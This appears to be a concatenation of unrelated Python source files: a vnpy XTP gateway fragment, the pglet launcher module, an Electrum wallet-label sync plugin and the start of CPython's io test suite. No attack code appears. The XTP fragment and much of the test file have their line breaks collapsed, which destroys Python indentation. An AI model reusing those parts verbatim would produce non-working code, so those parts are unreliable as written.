gateway_name=self.gateway_name ) self.gateway.on_account(account) if asset.account_type == XTP_ACCOUNT_TYPE.XTP_ACCOUNT_CREDIT: self.margin_trading = True elif asset.account_type == XTP_ACCOUNT_TYPE.XTP_ACCOUNT_DERIVE: self.option_trading = True def OnQueryStructuredFund(self, fund_info: XTPStructuredFundInfo, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" pass def OnQueryFundTransfer(self, fund_transfer_info: XTPFundTransferNotice, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" pass def OnFundTransfer(self, fund_transfer_info: XTPFundTransferNotice, session_id: int) -> Any: """""" pass def OnQueryETF(self, etf_info: XTPQueryETFBaseRsp, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" pass def OnQueryETFBasket(self, etf_component_info: XTPQueryETFComponentRsp, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" pass def OnQueryIPOInfoList(self, ipo_info: XTPQueryIPOTickerRsp, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" pass def OnQueryIPOQuotaInfo(self, quota_info: XTPQueryIPOQuotaRsp, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" pass def OnQueryOptionAuctionInfo(self, option_info: XTPQueryOptionAuctionInfoRsp, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" pass def OnQueryCreditDebtInfo(self, debt_info: XTPCrdDebtInfo, error_info: XTPRspInfoStruct, request_id: int, is_last: bool, session_id: int) -> Any: """""" if debt_info.debt_type == 1: symbol = debt_info.ticker exchange = MARKET_XTP2VT[debt_info.market] position = self.short_positions.get(symbol, None) if not position: position = PositionData( symbol=symbol, exchange=exchange, direction=Direction.SHORT, gateway_name=self.gateway_name ) self.short_positions[symbol] = position position.volume += debt_info.remain_qty if is_last: for position in self.short_positions.values(): self.gateway.on_position(position) 
self.short_positions.clear()
pglet.py
import os
import platform
import subprocess
import re
import signal
from threading import Thread
from time import sleep

from .utils import is_windows, which, encode_attr
from .connection import Connection
from .page import Page

# Path of the pglet helper executable; resolved by init() at import time.
# In development mode this is a binary found on PATH, otherwise it is the
# platform-specific binary bundled under <package>/bin/.
pglet_exe = ""


def _build_args(command, name, local, server, token, permissions, no_window):
    """Build the pglet command line shared by page() and app().

    Optional values are appended only when provided; "--all-events" is
    always requested so the Python side receives every page event.
    """
    pargs = [pglet_exe, command]

    if name is not None:
        pargs.append(name)

    if local:
        pargs.append("--local")

    if server is not None:
        pargs.append("--server")
        pargs.append(server)

    if token is not None:
        pargs.append("--token")
        pargs.append(token)

    if permissions is not None:
        pargs.append("--permissions")
        pargs.append(permissions)

    if no_window:
        pargs.append("--no-window")

    pargs.append("--all-events")
    return pargs


def page(name=None, local=False, server=None, token=None, permissions=None, no_window=False):
    """Create or connect to a shared pglet page and return a Page object.

    Runs the pglet helper once; it prints "<connection-id> <page-url>" and
    exits, after which all interaction goes through the returned Page.
    """
    pargs = _build_args("page", name, local, server, token, permissions, no_window)

    # Execute the pglet helper and parse "<conn-id> <url>" from its output.
    exe_result = subprocess.check_output(pargs).decode("utf-8").strip()
    conn_id, url = re.split(r"\s", exe_result, 1)
    print(url)

    conn = Connection(conn_id)
    return Page(conn, url)


def app(name=None, local=False, server=None, token=None, target=None, permissions=None, no_window=False):
    """Host a multi-session pglet app.

    The pglet helper keeps running: its first output line is the page URL,
    and every following line is the connection ID of a newly connected
    user session. Each session is served by calling `target(page)` on its
    own thread.

    Raises:
        ValueError: if `target` (the per-session handler) is missing.
    """
    if target is None:
        # ValueError subclasses Exception, so existing handlers still match.
        raise ValueError("target argument is not specified")

    pargs = _build_args("app", name, local, server, token, permissions, no_window)

    def session_wrapper(target, page):
        # Keep one crashed session from taking down the listener loop;
        # surface the error on the user's page instead.
        try:
            target(page)
        except Exception as e:
            print(f"Unhandled error processing page session {page.connection.conn_id}:", e)
            page.error(f"There was an error while processing your request: {e}")

    page_url = ""
    # bufsize=0 keeps stdout unbuffered so session IDs arrive immediately.
    proc = subprocess.Popen(pargs, bufsize=0, stdout=subprocess.PIPE)
    for bline in proc.stdout:
        line = bline.decode("utf-8").rstrip()
        if page_url == "":
            # First line printed by the helper is the page URL.
            page_url = line
            print(page_url)
        else:
            # Every subsequent line is the connection ID of a new session.
            conn = Connection(line)
            page = Page(conn, page_url)

            # Start the page session in its own thread.
            thread = Thread(target=session_wrapper, args=(target, page))
            thread.start()


def init():
    """Locate the pglet executable and store its path in `pglet_exe`.

    Prefers a binary already on PATH (development mode); otherwise picks
    the bundled binary matching the current OS and CPU architecture.

    Raises:
        Exception: if the platform or architecture is unsupported.
    """
    global pglet_exe

    pglet_exe = "pglet.exe" if is_windows() else "pglet"

    # Development mode: a pglet binary already on PATH wins.
    pglet_in_path = which(pglet_exe)
    if pglet_in_path:
        pglet_exe = pglet_in_path
        return

    bin_dir = os.path.join(os.path.dirname(__file__), "bin")

    p = platform.system()
    if is_windows():
        plat = "windows"
    elif p == "Linux":
        plat = "linux"
    elif p == "Darwin":
        plat = "darwin"
    else:
        raise Exception(f"Unsupported platform: {p}")

    a = platform.machine().lower()
    if a in ("x86_64", "amd64"):
        arch = "amd64"
    elif a in ("arm64", "aarch64"):
        arch = "arm64"
    elif a.startswith("arm"):
        arch = "arm"
    else:
        raise Exception(f"Unsupported architecture: {a}")

    pglet_exe = os.path.join(bin_dir, f"{plat}-{arch}", pglet_exe)


# init Pglet during import
init()

# Fix: https://bugs.python.org/issue35935
signal.signal(signal.SIGINT, signal.SIG_DFL)
labels.py
import hashlib
import requests
import threading
import json
import sys
import traceback
import base64

import electrum_rby as electrum
from electrum_rby.plugins import BasePlugin, hook
from electrum_rby.i18n import _


class LabelsPlugin(BasePlugin):
    """Sync wallet labels with an external label server.

    Label keys and values are AES-encrypted client-side with material
    derived from the wallet fingerprint (see start_wallet), so the server
    never sees plaintext. A per-wallet nonce tracks the last synced change.
    """

    def __init__(self, parent, config, name):
        BasePlugin.__init__(self, parent, config, name)
        self.target_host = 'labels.bauerj.eu'
        # wallet -> (aes key, iv, wallet_id); populated by start_wallet()
        self.wallets = {}

    def encode(self, wallet, msg):
        """Encrypt *msg* with the wallet's key/iv; return it base64-encoded."""
        password, iv, wallet_id = self.wallets[wallet]
        encrypted = electrum.bitcoin.aes_encrypt_with_iv(password, iv,
                                                         msg.encode('utf8'))
        return base64.b64encode(encrypted).decode()

    def decode(self, wallet, message):
        """Reverse of encode(): base64-decode then decrypt *message*."""
        password, iv, wallet_id = self.wallets[wallet]
        decoded = base64.b64decode(message)
        decrypted = electrum.bitcoin.aes_decrypt_with_iv(password, iv, decoded)
        return decrypted.decode('utf8')

    def get_nonce(self, wallet):
        """Return the nonce to be used with the next change (initializing
        it to 1 on first use)."""
        nonce = wallet.storage.get('wallet_nonce')
        if nonce is None:
            nonce = 1
            self.set_nonce(wallet, nonce)
        return nonce

    def set_nonce(self, wallet, nonce):
        """Persist the wallet's sync nonce."""
        self.print_error("set", wallet.basename(), "nonce to", nonce)
        wallet.storage.put("wallet_nonce", nonce)

    @hook
    def set_label(self, wallet, item, label):
        """Hook: push a single label change to the server asynchronously."""
        if wallet not in self.wallets:
            return
        if not item:
            return
        nonce = self.get_nonce(wallet)
        wallet_id = self.wallets[wallet][2]
        bundle = {"walletId": wallet_id,
                  "walletNonce": nonce,
                  "externalId": self.encode(wallet, item),
                  "encryptedLabel": self.encode(wallet, label)}
        t = threading.Thread(target=self.do_request,
                             args=["POST", "/label", False, bundle])
        t.daemon = True  # setDaemon() is deprecated; same behavior
        t.start()
        # Caller will write the wallet
        self.set_nonce(wallet, nonce + 1)

    def do_request(self, method, url="/labels", is_batch=False, data=None):
        """Perform one HTTP request against the label server.

        Returns the decoded JSON response; raises on non-200 status or a
        server-reported error.
        """
        url = 'https://' + self.target_host + url
        kwargs = {'headers': {}}
        if method == 'GET' and data:
            kwargs['params'] = data
        elif method == 'POST' and data:
            kwargs['data'] = json.dumps(data)
            kwargs['headers']['Content-Type'] = 'application/json'
        response = requests.request(method, url, **kwargs)
        if response.status_code != 200:
            # NOTE(review): raising BaseException is unusual (it escapes
            # `except Exception` handlers); kept for backward compatibility
            # with existing callers.
            raise BaseException(response.status_code, response.text)
        response = response.json()
        if "error" in response:
            raise BaseException(response["error"])
        return response

    def push_thread(self, wallet):
        """Upload every label of *wallet* to the server in one batch."""
        wallet_id = self.wallets[wallet][2]
        bundle = {"labels": [],
                  "walletId": wallet_id,
                  "walletNonce": self.get_nonce(wallet)}
        for key, value in wallet.labels.items():
            try:
                encoded_key = self.encode(wallet, key)
                encoded_value = self.encode(wallet, value)
            except Exception:
                self.print_error('cannot encode', repr(key), repr(value))
                continue
            bundle["labels"].append({'encryptedLabel': encoded_value,
                                     'externalId': encoded_key})
        self.do_request("POST", "/labels", True, bundle)

    def pull_thread(self, wallet, force):
        """Download labels changed since our nonce (all labels if *force*)
        and merge them into the wallet, preferring existing local labels
        unless *force* is set."""
        wallet_id = self.wallets[wallet][2]
        nonce = 1 if force else self.get_nonce(wallet) - 1
        self.print_error("asking for labels since nonce", nonce)
        try:
            response = self.do_request(
                "GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id)))
            if response["labels"] is None:
                self.print_error('no new labels')
                return

            result = {}
            for label in response["labels"]:
                try:
                    key = self.decode(wallet, label["externalId"])
                    value = self.decode(wallet, label["encryptedLabel"])
                except Exception:
                    # Undecryptable entry (e.g. wrong key) -- skip it.
                    continue
                try:
                    json.dumps(key)
                    json.dumps(value)
                except Exception:
                    # Skip labels that cannot round-trip through JSON.
                    self.print_error('error: no json', key)
                    continue
                result[key] = value

            for key, value in result.items():
                if force or not wallet.labels.get(key):
                    wallet.labels[key] = value

            # Fixed: was len(response), which counted the JSON dict's keys
            # (always ~2), not the number of labels received.
            self.print_error("received %d labels" % len(response["labels"]))
            # do not write to disk because we're in a daemon thread
            wallet.storage.put('labels', wallet.labels)
            self.set_nonce(wallet, response["nonce"] + 1)
            self.on_pulled(wallet)
        except Exception:
            traceback.print_exc(file=sys.stderr)
            self.print_error("could not retrieve labels")

    def start_wallet(self, wallet):
        """Derive the wallet's crypto material and kick off an initial pull.

        Key/iv/id derivation: sha1(fingerprint) -> aes key,
        sha256(key)[:16] -> iv, sha256(fingerprint) -> wallet_id.
        """
        nonce = self.get_nonce(wallet)
        self.print_error("wallet", wallet.basename(), "nonce is", nonce)
        mpk = wallet.get_fingerprint()
        if not mpk:
            return
        mpk = mpk.encode('ascii')
        password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')
        iv = hashlib.sha256(password).digest()[:16]
        wallet_id = hashlib.sha256(mpk).hexdigest()
        self.wallets[wallet] = (password, iv, wallet_id)
        # If there is an auth token we can try to actually start syncing
        t = threading.Thread(target=self.pull_thread, args=(wallet, False))
        t.daemon = True  # setDaemon() is deprecated; same behavior
        t.start()

    def stop_wallet(self, wallet):
        """Forget the wallet's crypto material; stops future syncs."""
        self.wallets.pop(wallet, None)
test_io.py
"""Unit tests for the io module."""

# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
#     (only enabled with -ulargefile)

################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################

import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import sysconfig
import textwrap
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import (
    assert_python_ok, assert_python_failure, run_python_until_end)
from test.support import threading_helper
from test.support import FakePath

import codecs
import io  # C implementation of io
import _pyio as pyio  # Python implementation of io

try:
    import ctypes
except ImportError:
    def byteslike(*pos, **kw):
        # ctypes unavailable: an array is still bytes-like while lacking
        # str/sequence convenience methods.
        return array.array("b", bytes(*pos, **kw))
else:
    def byteslike(*pos, **kw):
        """Create a bytes-like object having no string or sequence methods"""
        data = bytes(*pos, **kw)
        obj = EmptyStruct()
        ctypes.resize(obj, len(data))
        memoryview(obj).cast("B")[:] = data
        return obj
    class EmptyStruct(ctypes.Structure):
        # Zero-field Structure, resized at runtime to hold the raw bytes.
        pass

# Detect a Memory Sanitizer build, which some tests must skip or adapt to.
_cflags = sysconfig.get_config_var('CFLAGS') or ''
_config_args = sysconfig.get_config_var('CONFIG_ARGS') or ''
MEMORY_SANITIZER = (
    '-fsanitize=memory' in _cflags or
    '--with-memory-sanitizer' in _config_args
)

# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)


def _default_chunk_size():
    """Get the default TextIOWrapper chunk size"""
    with open(__file__, "r", encoding="latin-1") as f:
        return f._CHUNK_SIZE


class MockRawIOWithoutRead:
    """A RawIO implementation without read(), so as to exercise the default
    RawIO.read() which calls readinto()."""

    def __init__(self, read_stack=()):
        # Canned results served by successive readinto() calls; a None
        # entry simulates a raw stream that would block.
        self._read_stack = list(read_stack)
        self._write_stack = []
        self._reads = 0
        self._extraneous_reads = 0

    def write(self, b):
        self._write_stack.append(bytes(b))
        return len(b)

    def writable(self):
        return True

    def fileno(self):
        return 42

    def readable(self):
        return True

    def seekable(self):
        return True

    def seek(self, pos, whence):
        return 0  # wrong but we gotta return something

    def tell(self):
        return 0  # same comment as above

    def readinto(self, buf):
        self._reads += 1
        max_len = len(buf)
        try:
            data = self._read_stack[0]
        except IndexError:
            # Reading past the scripted data: count it so tests can check
            # the buffered layer did not over-read.
            self._extraneous_reads += 1
            return 0
        if data is None:
            del self._read_stack[0]
            return None
        n = len(data)
        if len(data) <= max_len:
            del self._read_stack[0]
            buf[:n] = data
            return n
        else:
            # Partial read: keep the unread remainder at the queue head.
            buf[:] = data[:max_len]
            self._read_stack[0] = data[max_len:]
            return max_len

    def truncate(self, pos=None):
        return pos

class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
    pass

class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
    pass


class MockRawIO(MockRawIOWithoutRead):
    """Same scripted raw IO, but with a native read() as well."""

    def read(self, n=None):
        self._reads += 1
        try:
            return self._read_stack.pop(0)
        except:
            self._extraneous_reads += 1
            return b""

class CMockRawIO(MockRawIO, io.RawIOBase):
    pass

class PyMockRawIO(MockRawIO, pyio.RawIOBase):
    pass
class MisbehavedRawIO(MockRawIO):
    """Raw IO whose write/read/seek/tell/readinto all report wrong values,
    used to check that the buffered layers validate what raw IO returns."""

    def write(self, b):
        return super().write(b) * 2

    def read(self, n=None):
        return super().read(n) * 2

    def seek(self, pos, whence):
        return -123

    def tell(self):
        return -456

    def readinto(self, buf):
        super().readinto(buf)
        return len(buf) * 5

class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
    pass

class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
    pass


class SlowFlushRawIO(MockRawIO):
    """Raw IO whose flush() is slow and signals (via an Event) when it has
    started, so tests can exercise concurrent-flush scenarios."""

    def __init__(self):
        super().__init__()
        self.in_flush = threading.Event()

    def flush(self):
        self.in_flush.set()
        time.sleep(0.25)

class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
    pass

class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
    pass


class CloseFailureIO(MockRawIO):
    """Raw IO whose first close() raises OSError; later closes succeed."""

    closed = 0

    def close(self):
        if not self.closed:
            self.closed = 1
            raise OSError

class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
    pass

class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
    pass


class MockFileIO:
    """BytesIO mixin recording the size of every read()/readinto() result."""

    def __init__(self, data):
        self.read_history = []
        super().__init__(data)

    def read(self, n=None):
        res = super().read(n)
        self.read_history.append(None if res is None else len(res))
        return res

    def readinto(self, b):
        res = super().readinto(b)
        self.read_history.append(res)
        return res

class CMockFileIO(MockFileIO, io.BytesIO):
    pass

class PyMockFileIO(MockFileIO, pyio.BytesIO):
    pass


class MockUnseekableIO:
    """Mixin that refuses all seek-related operations with
    UnsupportedOperation (supplied by the C/Py subclasses below)."""

    def seekable(self):
        return False

    def seek(self, *args):
        raise self.UnsupportedOperation("not seekable")

    def tell(self, *args):
        raise self.UnsupportedOperation("not seekable")

    def truncate(self, *args):
        raise self.UnsupportedOperation("not seekable")

class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
    UnsupportedOperation = io.UnsupportedOperation

class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
    UnsupportedOperation = pyio.UnsupportedOperation


class MockNonBlockWriterIO:
    """Raw IO simulating a non-blocking writer: write() returns a short
    count or None (would-block) when the configured blocker char appears."""

    def __init__(self):
        self._write_stack = []
        self._blocker_char = None

    def pop_written(self):
        s = b"".join(self._write_stack)
        self._write_stack[:] = []
        return s

    # NOTE: the body of block_on() continues beyond this chunk of the file.
    def block_on(self, char):
"""Block when a given char is encountered.""" self._blocker_char = char def readable(self): return True def seekable(self): return True def seek(self, pos, whence=0): # naive implementation, enough for tests return 0 def writable(self): return True def write(self, b): b = bytes(b) n = -1 if self._blocker_char: try: n = b.index(self._blocker_char) except ValueError: pass else: if n > 0: # write data up to the first blocker self._write_stack.append(b[:n]) return n else: # cancel blocker and indicate would block self._blocker_char = None return None self._write_stack.append(b) return len(b) class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase): BlockingIOError = io.BlockingIOError class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase): BlockingIOError = pyio.BlockingIOError class IOTest(unittest.TestCase): def setUp(self): support.unlink(support.TESTFN) def tearDown(self): support.unlink(support.TESTFN) def write_ops(self, f): self.assertEqual(f.write(b"blah."), 5) f.truncate(0) self.assertEqual(f.tell(), 5) f.seek(0) self.assertEqual(f.write(b"blah."), 5) self.assertEqual(f.seek(0), 0) self.assertEqual(f.write(b"Hello."), 6) self.assertEqual(f.tell(), 6) self.assertEqual(f.seek(-1, 1), 5) self.assertEqual(f.tell(), 5) buffer = bytearray(b" world\n\n\n") self.assertEqual(f.write(buffer), 9) buffer[:] = b"*" * 9 # Overwrite our copy of the data self.assertEqual(f.seek(0), 0) self.assertEqual(f.write(b"h"), 1) self.assertEqual(f.seek(-1, 2), 13) self.assertEqual(f.tell(), 13) self.assertEqual(f.truncate(12), 12) self.assertEqual(f.tell(), 13) self.assertRaises(TypeError, f.seek, 0.0) def read_ops(self, f, buffered=False): data = f.read(5) self.assertEqual(data, b"hello") data = byteslike(data) self.assertEqual(f.readinto(data), 5) self.assertEqual(bytes(data), b" worl") data = bytearray(5) self.assertEqual(f.readinto(data), 2) self.assertEqual(len(data), 5) self.assertEqual(data[:2], b"d\n") self.assertEqual(f.seek(0), 0) 
self.assertEqual(f.read(20), b"hello world\n") self.assertEqual(f.read(1), b"") self.assertEqual(f.readinto(byteslike(b"x")), 0) self.assertEqual(f.seek(-6, 2), 6) self.assertEqual(f.read(5), b"world") self.assertEqual(f.read(0), b"") self.assertEqual(f.readinto(byteslike()), 0) self.assertEqual(f.seek(-6, 1), 5) self.assertEqual(f.read(5), b" worl") self.assertEqual(f.tell(), 10) self.assertRaises(TypeError, f.seek, 0.0) if buffered: f.seek(0) self.assertEqual(f.read(), b"hello world\n") f.seek(6) self.assertEqual(f.read(), b"world\n") self.assertEqual(f.read(), b"") f.seek(0) data = byteslike(5) self.assertEqual(f.readinto1(data), 5) self.assertEqual(bytes(data), b"hello") LARGE = 2**31 def large_file_ops(self, f): assert f.readable() assert f.writable() try: self.assertEqual(f.seek(self.LARGE), self.LARGE) except (OverflowError, ValueError): self.skipTest("no largefile support") self.assertEqual(f.tell(), self.LARGE) self.assertEqual(f.write(b"xxx"), 3) self.assertEqual(f.tell(), self.LARGE + 3) self.assertEqual(f.seek(-1, 1), self.LARGE + 2) self.assertEqual(f.truncate(), self.LARGE + 2) self.assertEqual(f.tell(), self.LARGE + 2) self.assertEqual(f.seek(0, 2), self.LARGE + 2) self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1) self.assertEqual(f.tell(), self.LARGE + 2) self.assertEqual(f.seek(0, 2), self.LARGE + 1) self.assertEqual(f.seek(-1, 2), self.LARGE) self.assertEqual(f.read(2), b"x") def test_invalid_operations(self): # Try writing on a file opened in read mode and vice-versa. 
exc = self.UnsupportedOperation for mode in ("w", "wb"): with self.open(support.TESTFN, mode) as fp: self.assertRaises(exc, fp.read) self.assertRaises(exc, fp.readline) with self.open(support.TESTFN, "wb", buffering=0) as fp: self.assertRaises(exc, fp.read) self.assertRaises(exc, fp.readline) with self.open(support.TESTFN, "rb", buffering=0) as fp: self.assertRaises(exc, fp.write, b"blah") self.assertRaises(exc, fp.writelines, [b"blah\n"]) with self.open(support.TESTFN, "rb") as fp: self.assertRaises(exc, fp.write, b"blah") self.assertRaises(exc, fp.writelines, [b"blah\n"]) with self.open(support.TESTFN, "r") as fp: self.assertRaises(exc, fp.write, "blah") self.assertRaises(exc, fp.writelines, ["blah\n"]) # Non-zero seeking from current or end pos self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR) self.assertRaises(exc, fp.seek, -1, self.SEEK_END) def test_optional_abilities(self): # Test for OSError when optional APIs are not supported # The purpose of this test is to try fileno(), reading, writing and # seeking operations with various objects that indicate they do not # support these operations. 
def pipe_reader(): [r, w] = os.pipe() os.close(w) # So that read() is harmless return self.FileIO(r, "r") def pipe_writer(): [r, w] = os.pipe() self.addCleanup(os.close, r) # Guarantee that we can write into the pipe without blocking thread = threading.Thread(target=os.read, args=(r, 100)) thread.start() self.addCleanup(thread.join) return self.FileIO(w, "w") def buffered_reader(): return self.BufferedReader(self.MockUnseekableIO()) def buffered_writer(): return self.BufferedWriter(self.MockUnseekableIO()) def buffered_random(): return self.BufferedRandom(self.BytesIO()) def buffered_rw_pair(): return self.BufferedRWPair(self.MockUnseekableIO(), self.MockUnseekableIO()) def text_reader(): class UnseekableReader(self.MockUnseekableIO): writable = self.BufferedIOBase.writable write = self.BufferedIOBase.write return self.TextIOWrapper(UnseekableReader(), "ascii") def text_writer(): class UnseekableWriter(self.MockUnseekableIO): readable = self.BufferedIOBase.readable read = self.BufferedIOBase.read return self.TextIOWrapper(UnseekableWriter(), "ascii") tests = ( (pipe_reader, "fr"), (pipe_writer, "fw"), (buffered_reader, "r"), (buffered_writer, "w"), (buffered_random, "rws"), (buffered_rw_pair, "rw"), (text_reader, "r"), (text_writer, "w"), (self.BytesIO, "rws"), (self.StringIO, "rws"), ) for [test, abilities] in tests: with self.subTest(test), test() as obj: readable = "r" in abilities self.assertEqual(obj.readable(), readable) writable = "w" in abilities self.assertEqual(obj.writable(), writable) if isinstance(obj, self.TextIOBase): data = "3" elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)): data = b"3" else: self.fail("Unknown base class") if "f" in abilities: obj.fileno() else: self.assertRaises(OSError, obj.fileno) if readable: obj.read(1) obj.read() else: self.assertRaises(OSError, obj.read, 1) self.assertRaises(OSError, obj.read) if writable: obj.write(data) else: self.assertRaises(OSError, obj.write, data) if sys.platform.startswith("win") and 
test in ( pipe_reader, pipe_writer): # Pipes seem to appear as seekable on Windows continue seekable = "s" in abilities self.assertEqual(obj.seekable(), seekable) if seekable: obj.tell() obj.seek(0) else: self.assertRaises(OSError, obj.tell) self.assertRaises(OSError, obj.seek, 0) if writable and seekable: obj.truncate() obj.truncate(0) else: self.assertRaises(OSError, obj.truncate) self.assertRaises(OSError, obj.truncate, 0) def test_open_handles_NUL_chars(self): fn_with_NUL = 'foo\0bar' self.assertRaises(ValueError, self.open, fn_with_NUL, 'w') bytes_fn = bytes(fn_with_NUL, 'ascii') with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) self.assertRaises(ValueError, self.open, bytes_fn, 'w') def test_raw_file_io(self): with self.open(support.TESTFN, "wb", buffering=0) as f: self.assertEqual(f.readable(), False) self.assertEqual(f.writable(), True) self.assertEqual(f.seekable(), True) self.write_ops(f) with self.open(support.TESTFN, "rb", buffering=0) as f: self.assertEqual(f.readable(), True) self.assertEqual(f.writable(), False) self.assertEqual(f.seekable(), True) self.read_ops(f) def test_buffered_file_io(self): with self.open(support.TESTFN, "wb") as f: self.assertEqual(f.readable(), False) self.assertEqual(f.writable(), True) self.assertEqual(f.seekable(), True) self.write_ops(f) with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.readable(), True) self.assertEqual(f.writable(), False) self.assertEqual(f.seekable(), True) self.read_ops(f, True) def test_readline(self): with self.open(support.TESTFN, "wb") as f: f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line") with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.readline(), b"abc\n") self.assertEqual(f.readline(10), b"def\n") self.assertEqual(f.readline(2), b"xy") self.assertEqual(f.readline(4), b"zzy\n") self.assertEqual(f.readline(), b"foo\x00bar\n") self.assertEqual(f.readline(None), b"another line") self.assertRaises(TypeError, f.readline, 5.3) with 
self.open(support.TESTFN, "r") as f: self.assertRaises(TypeError, f.readline, 5.3) def test_readline_nonsizeable(self): # Issue #30061 # Crash when readline() returns an object without __len__ class R(self.IOBase): def readline(self): return None self.assertRaises((TypeError, StopIteration), next, R()) def test_next_nonsizeable(self): # Issue #30061 # Crash when __next__() returns an object without __len__ class R(self.IOBase): def __next__(self): return None self.assertRaises(TypeError, R().readlines, 1) def test_raw_bytes_io(self): f = self.BytesIO() self.write_ops(f) data = f.getvalue() self.assertEqual(data, b"hello world\n") f = self.BytesIO(data) self.read_ops(f, True) def test_large_file_ops(self): # On Windows and Mac OSX this test consumes large resources; It takes # a long time to build the >2 GiB file and takes >2 GiB of disk space # therefore the resource must be enabled to run this test. if sys.platform[:3] == 'win' or sys.platform == 'darwin': support.requires( 'largefile', 'test requires %s bytes and a long time to run' % self.LARGE) with self.open(support.TESTFN, "w+b", 0) as f: self.large_file_ops(f) with self.open(support.TESTFN, "w+b") as f: self.large_file_ops(f) def test_with_open(self): for bufsize in (0, 100): f = None with self.open(support.TESTFN, "wb", bufsize) as f: f.write(b"xxx") self.assertEqual(f.closed, True) f = None try: with self.open(support.TESTFN, "wb", bufsize) as f: 1/0 except ZeroDivisionError: self.assertEqual(f.closed, True) else: self.fail("1/0 didn't raise an exception") # issue 5008 def test_append_mode_tell(self): with self.open(support.TESTFN, "wb") as f: f.write(b"xxx") with self.open(support.TESTFN, "ab", buffering=0) as f: self.assertEqual(f.tell(), 3) with self.open(support.TESTFN, "ab") as f: self.assertEqual(f.tell(), 3) with self.open(support.TESTFN, "a") as f: self.assertGreater(f.tell(), 0) def test_destructor(self): record = [] class MyFileIO(self.FileIO): def __del__(self): record.append(1) try: f = 
super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() with support.check_warnings(('', ResourceWarning)): f = MyFileIO(support.TESTFN, "wb") f.write(b"xxx") del f support.gc_collect() self.assertEqual(record, [1, 2, 3]) with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"xxx") def _check_base_destructor(self, base): record = [] class MyIO(base): def __init__(self): # This exercises the availability of attributes on object # destruction. # (in the C version, close() is called by the tp_dealloc # function, not by __del__) self.on_del = 1 self.on_close = 2 self.on_flush = 3 def __del__(self): record.append(self.on_del) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(self.on_close) super().close() def flush(self): record.append(self.on_flush) super().flush() f = MyIO() del f support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_IOBase_destructor(self): self._check_base_destructor(self.IOBase) def test_RawIOBase_destructor(self): self._check_base_destructor(self.RawIOBase) def test_BufferedIOBase_destructor(self): self._check_base_destructor(self.BufferedIOBase) def test_TextIOBase_destructor(self): self._check_base_destructor(self.TextIOBase) def test_close_flushes(self): with self.open(support.TESTFN, "wb") as f: f.write(b"xxx") with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"xxx") def test_array_writes(self): a = array.array('i', range(10)) n = len(a.tobytes()) def check(f): with f: self.assertEqual(f.write(a), n) f.writelines((a,)) check(self.BytesIO()) check(self.FileIO(support.TESTFN, "w")) check(self.BufferedWriter(self.MockRawIO())) check(self.BufferedRandom(self.MockRawIO())) check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())) def test_closefd(self): self.assertRaises(ValueError, self.open, support.TESTFN, 'w', closefd=False) def 
